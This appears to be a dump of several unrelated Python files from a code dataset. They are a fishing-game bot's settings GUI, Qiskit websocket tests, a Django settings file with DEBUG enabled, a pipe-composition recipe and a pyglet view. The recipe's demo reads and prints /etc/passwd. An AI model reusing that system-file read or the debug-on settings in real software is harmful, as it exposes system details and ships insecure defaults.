p.set("Settings", "game_resolution", str(resolution))
p.set("Settings", "volume_threshold", str(max_volume))
p.set("Settings", "tracking_zone", str(screen_area))
p.set("Settings", "bait_inventory", str(coord_bait))
p.set("Settings", "food_inventory", str(coord_food))
p.set("Settings", "detection_threshold", str(detection_threshold))
p.set("Settings", "launch_time1", str(dist_launch_time1))
p.set("Settings", "launch_time2", str(dist_launch_time2))
p.set("Settings", "launch_time3", str(dist_launch_time3))
p.set("Settings", "launch_time4", str(dist_launch_time4))
p.set("Settings", "cast_time", str(cast_time))
p.write(open(f"Settings.ini", "w"))
log_info(f"Saved New Settings to settings.ini", logger="Information")
# Settings for DearPyGui window
set_main_window_size(600, 500)
set_style_window_menu_button_position(0)
set_theme("Gold")
set_global_font_scale(1)
set_main_window_resizable(False)
# Creates the DearPyGui Window
with window("Fisherman Window", width=600, height=500):
set_window_pos("Fisherman Window", 0, 0)
add_input_int(
"Amount Of Spots", max_value=4, min_value=0, tip="Amount of Fishing Spots"
)
add_input_int(
"Set Volume Threshold",
max_value=100000,
min_value=0,
default_value=int(max_volume),
callback=save_volume,
tip="Volume Threshold to trigger catch event",
)
add_input_float(
"Set Detection Threshold",
min_value=0.1,
max_value=2.5,
default_value=detection_threshold,
callback=save_threshold,
)
# add_spacing(count = 3)
add_slider_float(
"Set Time Launch Distance 1",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time1,
callback=save_dist_launch_time1,
tip="Time to determine the launch distance 1",
)
add_slider_float(
"Set Time Launch Distance 2",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time2,
callback=save_dist_launch_time2,
tip="Time to determine the launch distance 2",
)
add_slider_float(
"Set Time Launch Distance 3",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time3,
callback=save_dist_launch_time3,
tip="Time to determine the launch distance 3",
)
add_slider_float(
"Set Time Launch Distance 4",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time4,
callback=save_dist_launch_time4,
tip="Time to determine the launch distance 4",
)
add_slider_int(
"Set Cast Time",
min_value=1,
max_value=60,
default_value=int(cast_time),
callback=save_cast_time,
tip="time to determine how long without getting fish",
)
add_listbox(
"Set Game Resolution",
items=resolutions,
default_value=int(resolution),
callback=save_resolution,
)
add_spacing(count=3)
add_button(
"Set Fishing Spots",
width=130,
callback=generate_coords,
tip="Starts function that lets you select fishing spots",
)
add_same_line()
add_button(
"Set Tracking Zone",
callback=Grab_Screen,
tip="Sets zone bot tracks for solving fishing minigame",
)
add_same_line()
add_button(
"Set Bait Inventory", callback=bait_coords, tip="Sets zone bot bait inventory"
)
add_same_line()
add_button(
"Set Food Inventory", callback=food_coords, tip="Sets zone bot food inventory"
)
add_spacing(count=5)
add_button("Start Bot", callback=start, tip="Starts the bot. Or press f1")
add_same_line()
add_button("Stop Bot", callback=stop, tip="Stops the bot. Or press f2")
add_same_line()
add_button(
"Save Settings",
callback=save_settings,
tip="Saves bot settings to settings.ini",
)
add_spacing(count=5)
add_logger("Information", log_level=0)
log_info(
f"Loaded Settings. Volume Threshold:{max_volume},Tracking Zone:{screen_area}, Cast Time: {cast_time},Debug Mode:{debugmode}",
logger="Information",
)
Setup()
threading.Thread(target=Setup_title).start()
start_dearpygui()
|
test_websocket.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the Websocket client."""
import asyncio
from contextlib import suppress
import warnings
import sys
import importlib
import threading
import websockets
from qiskit.providers.ibmq.api.exceptions import (
WebsocketError, WebsocketTimeoutError, WebsocketIBMQProtocolError)
from qiskit.providers.ibmq.api.clients.websocket import WebsocketClient
from qiskit.providers.ibmq.utils.utils import RefreshQueue
from ...ibmqtestcase import IBMQTestCase
from .websocket_server import (
TOKEN_JOB_COMPLETED, TOKEN_JOB_TRANSITION, TOKEN_WRONG_FORMAT,
TOKEN_TIMEOUT, TOKEN_WEBSOCKET_RETRY_SUCCESS,
TOKEN_WEBSOCKET_RETRY_FAILURE, TOKEN_WEBSOCKET_JOB_NOT_FOUND,
websocket_handler)
TEST_IP_ADDRESS = '127.0.0.1'
INVALID_PORT = 9876
VALID_PORT = 8765
class TestWebsocketClient(IBMQTestCase):
"""Tests for the websocket client."""
def test_invalid_url(self):
"""Test connecting to an invalid URL."""
client = WebsocketClient('wss://{}:{}'.format(TEST_IP_ADDRESS, INVALID_PORT), None)
with self.assertRaises(WebsocketError):
asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_asyncio_threading(self):
"""Test asyncio when importing webserver in new thread"""
def _import_websocket():
try:
importlib.reload(sys.modules["qiskit.providers.ibmq.api.clients.websocket"])
except RuntimeError:
self.fail("Importing websocket in new thread failed due to asyncio!")
thread = threading.Thread(target=_import_websocket)
thread.start()
thread.join()
class TestWebsocketClientMock(IBMQTestCase):
"""Tests for the the websocket client against a mock server."""
@classmethod
def setUpClass(cls):
"""Initial class level setup."""
super().setUpClass()
# Launch the mock server.
start_server = websockets.serve(websocket_handler, TEST_IP_ADDRESS, int(VALID_PORT))
cls.server = asyncio.get_event_loop().run_until_complete(start_server)
@classmethod
def tearDownClass(cls):
"""Class level cleanup."""
super().tearDownClass()
# Close the mock server.
loop = asyncio.get_event_loop()
cls.server.close()
loop.run_until_complete(cls.server.wait_closed())
with warnings.catch_warnings():
# Suppress websockets deprecation warning
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
# Manually cancel any pending asyncio tasks.
if sys.version_info[0:2] < (3, 9):
pending = asyncio.Task.all_tasks()
else:
pending = asyncio.all_tasks(loop)
for task in pending:
task.cancel()
try:
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
except Exception as err: # pylint: disable=broad-except
cls.log.error("An error %s occurred canceling task %s. "
"Traceback:", str(err), str(task))
task.print_stack()
def test_job_final_status(self):
"""Test retrieving a job already in final status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_COMPLETED)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_job_transition(self):
"""Test retrieving a job that transitions to final status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_TRANSITION)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_timeout(self):
"""Test timeout during retrieving a job status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_TIMEOUT)
with self.assertRaises(WebsocketTimeoutError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id', timeout=2))
def test_invalid_response(self):
"""Test unparseable response from the server."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WRONG_FORMAT)
with self.assertRaises(WebsocketIBMQProtocolError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_retry_success(self):
"""Test retrieving a job status during a retry attempt."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_RETRY_SUCCESS)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_websocket_retry_failure(self):
"""Test exceeding the retry limit for retrieving a job status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_RETRY_FAILURE)
with self.assertRaises(WebsocketError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_job_not_found(self):
"""Test retrieving a job status for an non existent id."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WEBSOCKET_JOB_NOT_FOUND)
with self.assertRaises(WebsocketError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_websocket_status_queue(self):
"""Test status queue used by websocket client."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_TRANSITION)
status_queue = RefreshQueue(maxsize=10)
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id', status_queue=status_queue))
self.assertEqual(status_queue.qsize(), 2)
|
settings_20210906111421.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
def sayHi():
print("Hi")
schedule.every().day.at("11:15").do(sayHi)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(5)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
recipe-576757.py
|
from io import BytesIO
from subprocess import Popen, PIPE
from os import pipe, fdopen
from threading import Thread
class Pipeable( object ):
def __init__( self ):
self.output = None
def _output( self, input = None ):
return self.output
def __or__( self, right ):
if not isinstance( right, Pipeable ): return NotImplemented
self.output = right._output( self._output() )
return self
class Shell( Pipeable ):
def __init__( self, cmd ):
Pipeable.__init__( self )
self.cmd = cmd
def _output( self, input = None ):
return Popen( self.cmd, stdin = input, stdout = PIPE ).stdout
class ThreadedFilter( Pipeable ):
def __init__( self, filter ):
self.filter = filter
_pipe = pipe()
self.pipe = fdopen( _pipe[ 1 ], 'w' )
self.output = fdopen( _pipe[ 0 ], 'r' )
def _output( self, input = None ):
def _target():
_out = self.pipe
for line in input:
_out.write( self.filter( line ) )
Thread( target = _target ).start()
return self.output
class CachedFilter( Pipeable ):
def __init__( self, filter ):
self.filter = filter
def _output( self, input = None ):
output = BytesIO()
for line in input:
output.write( self.filter( line ) )
output.seek( 0 )
return output
class Output( Pipeable ):
def __init__( self, output ):
self.output = output
class Print( object ):
def __ror__( self, left ):
print left.output.read()
class Write( object ):
def __init__( self, path ):
self.path = path
def __ror__( self, left ):
f = open( self.path, 'w' )
while True:
buf = left.output.read( 1024 )
if not buf: break
f.write( buf )
f.close()
if __name__ == '__main__':
Output( open( "/etc/passwd" ) ) | Shell( "rev" ) | ThreadedFilter( lambda str : str[::-1] ) | CachedFilter( lambda x : x ) | Print()
|
TschunkView.py
|
import sys
import pyglet
from pyglet.gl import *
import primitives
import utils
from map1 import *
import threading
FPS = 60
smoothConfig = utils.getSmoothConfig()
class TschunkView(pyglet.window.Window):
def mapX(self, x):
return self.cord_origin_x + x * self.x_step
def mapY(self, y):
return self.cord_origin_y + y * self.y_step
def __init__(self, mymap):
super(TschunkView, self).__init__(fullscreen=False, caption='Tschunk!', config=smoothConfig)
self.map = mymap
self.image = pyglet.resource.image(mymap.img)
self.sprite = pyglet.sprite.Sprite(self.image)
self.y_step = self.image.height / mymap.rows + 1
self.x_step = self.image.width / mymap.cols + 1
self.cord_origin_x = self.x_step/2
self.cord_origin_y = self.y_step/2
self.x = mymap.origin_x
self.y = mymap.origin_y
start_x = self.mapX(self.x)
start_y = self.mapY(self.y)
self.direction = mymap.initial_direction
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#self.l = primitives.Line((0,0),(100,100),stroke=10,color=(1,0,0,1))
self.c = primitives.Circle(start_x, start_y,width=self.y_step,color=(1.,0.,0.,1.))
self.drops = []
# Setup debug framerate display:
self.fps_display = pyglet.clock.ClockDisplay()
# Schedule the update of this window, so it will advance in time at the
# defined framerate. If we don't, the window will only update on events
# like mouse motion.
#pyglet.clock.schedule_interval(self.update, 1.0)
self.set_size(self.image.width, self.image.height)
def on_draw(self):
self.c.x = self.mapX(self.x)
self.c.y = self.mapY(self.y)
self.clear()
self.sprite.draw()
#self.l.render()
self.c.render()
for drop in self.drops:
drop.render()
#self.fps_display.draw()
#def update(self, dt):
# if self.c.y - self.y_step > 0:
# self.c.y -= self.y_step
#def on_mouse_motion(self, x, y, dx, dy):
# nothing to do here if not in debug
#print x, y
def run(self, callback=lambda s:None):
self.thread = threading.Thread(target=callback)
self.thread.setDaemon(True)
self.thread.start()
pyglet.app.run()
def dropTo(self, x, y):
self.drops.append(primitives.Circle(self.mapX(x), self.mapY(y),width=self.y_step,color=(0.,.9,0.,1.)))
def drop(self):
(x, y) = self.direction
self.dropTo(self.x + x, self.y + y)
def setDirection(self, direction):
self.direction = direction
def moveTo(self, x, y):
self.x = x
self.y = y
def move(self):
self.moveBy(self.direction)
def moveBy(self, direction):
(x, y) = direction
success = False
if self.y + y > 0 and self.y + y < self.map.rows:
self.y += y
success = True
if self.x + x > 0 and self.x + x < self.map.cols:
self.x += x
success = True
return success
if __name__ == '__main__':
TschunkView(TschunkMap1())
sys.exit(pyglet.app.run())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.